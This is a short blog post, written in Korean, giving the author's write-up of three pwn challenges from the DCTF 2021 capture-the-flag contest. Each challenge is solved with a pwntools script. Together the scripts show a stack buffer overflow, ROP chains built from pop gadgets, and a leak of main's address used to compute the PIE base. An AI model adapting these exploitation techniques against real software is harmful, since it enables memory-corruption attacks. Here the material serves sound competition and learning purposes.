CTF-Writeup
DCTF 2021 Write-up
Rasser
2021. 8. 23. 16:38
DCTF 2021 Write-UP
개인 사정으로 인해 대회가 끝난 뒤에 풀었지만, 해답은 보지 않았음
pinch_me
from pwn import *

# Solve script for the DCTF 2021 "pinch_me" challenge.
# For a local run, swap the remote() line for process('./pinch_me').
p = remote('dctf1-chall-pinch-me.westeurope.azurecontainer.io', 7480)
e = ELF('./pinch_me')

# Input layout: 24 filler bytes, then 0x1337C0DE packed as a 64-bit word.
# NOTE(review): the binary is not shown on this page. Presumably the filler
# spans a fixed-size stack buffer and the packed value lands on an adjacent
# variable that the program compares -- confirm against the disassembly.
# The defensive takeaway is the usual one for this bug class: the read into
# the buffer has to be bounded by the buffer's size.
filler = b'A' * 24
magic = p64(0x1337C0DE)
payload = filler + magic

# Wait for the prompt that ends in 'dreaming?\n', then send the input line.
p.sendlineafter('dreaming?\n', payload)
p.interactive()
pwn_sanity_check
from pwn import *

# Solve script for the DCTF 2021 "pwn_sanity_check" challenge.
# For a local run, use process('./pwn_sanity_check') in place of remote();
# gdb.attach(p) can be called before sending to inspect the stack.
p = remote('dctf-chall-pwn-sanity-check.westeurope.azurecontainer.io', 7480)
e = ELF('./pwn_sanity_check')

# Absolute code addresses used as-is, with no base added.
# NOTE(review): this presumably means the binary is not position-independent;
# confirm with checksec. The names suggest `pop rdi` / `pop rsi` gadgets.
pop_rdi_gadget = 0x400813
pop_rsi_gadget = 0x400811

# 60 + 8 + 4 = 72 (0x48) bytes precede the first address in the input.
chunks = [
    b'A' * 60,             # filler
    p64(0xDEADC0DE),       # 8-byte word placed at offset 60
    b'B' * 4,              # 4 more filler bytes, up to offset 0x48
    p64(pop_rdi_gadget),
    p64(0xDEADBEEF),       # value following the first gadget address
    p64(pop_rsi_gadget),
    p64(0x1337C0DE),       # value following the second gadget address
    p64(0),                # extra zero word; presumably consumed by a second
                           # pop in that gadget -- confirm in the disassembly
    p64(0x400697),         # final address; the target is not shown here
]
payload = b''.join(chunks)

# Wait for the prompt that ends in 'joke\n', then send the input line.
p.sendlineafter('joke\n', payload)
p.interactive()
hotel_rop
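from pwn import *

# Solve script for the DCTF 2021 "hotel_rop" challenge, run against a local
# copy of the binary.
p = process('./hotel_rop')
e = ELF('./hotel_rop')

# The script reads 14 characters after the text 'street ' and parses them as
# a hex address ('0x' plus 12 hex digits), which it treats as the runtime
# address of main. recvn() is used so the parse never sees a short read.
p.recvuntil(b'street ')
main_addr = int(p.recvn(14), 16)

# Subtracting main's offset inside the ELF gives the load base of the
# hotel_rop image itself (its PIE base). This is not a libc base: every
# address below is computed from symbols and offsets of the challenge binary.
# NOTE(review): the printed code pointer is what lets all later addresses be
# computed; without that disclosure the randomised base would be unknown.
pie_base = main_addr - e.symbols['main']

california_addr = pie_base + e.symbols['california']
silicon_addr = pie_base + e.symbols['silicon_valley']
loss_addr = pie_base + e.symbols['loss']

# Offsets inside the binary; the names suggest `pop rdi` / `pop rsi` gadgets.
poprdi = pie_base + 0x140b
poprsi = pie_base + 0x1409

print("[+] PIE base addr 0x%x" % pie_base)
print("[+] california_addr : 0x%x" % california_addr)
print("[+] silicon_addr : 0x%x" % silicon_addr)

# 0x20 + 8 = 40 filler bytes precede the first address.
# NOTE(review): presumably a 0x20-byte buffer plus the saved frame pointer;
# confirm against the disassembly.
payload = b"A" * 0x20
payload += b"B" * 8
# Addresses are laid out in the order california -> silicon_valley -> loss;
# what each function does is not shown on this page.
payload += p64(california_addr)
payload += p64(silicon_addr)
payload += p64(poprdi)
payload += p64(0x1337C0DE)
payload += p64(poprsi)
payload += p64(0xCB760000)
# Extra zero word after the second gadget; presumably consumed by an
# additional pop in that gadget -- confirm.
payload += p64(0)
payload += p64(loss_addr)

# Wait for the prompt that ends in 'often?\n', send the line, then hand the
# session over to the terminal.
p.sendlineafter(b'often?\n', payload)
p.interactive()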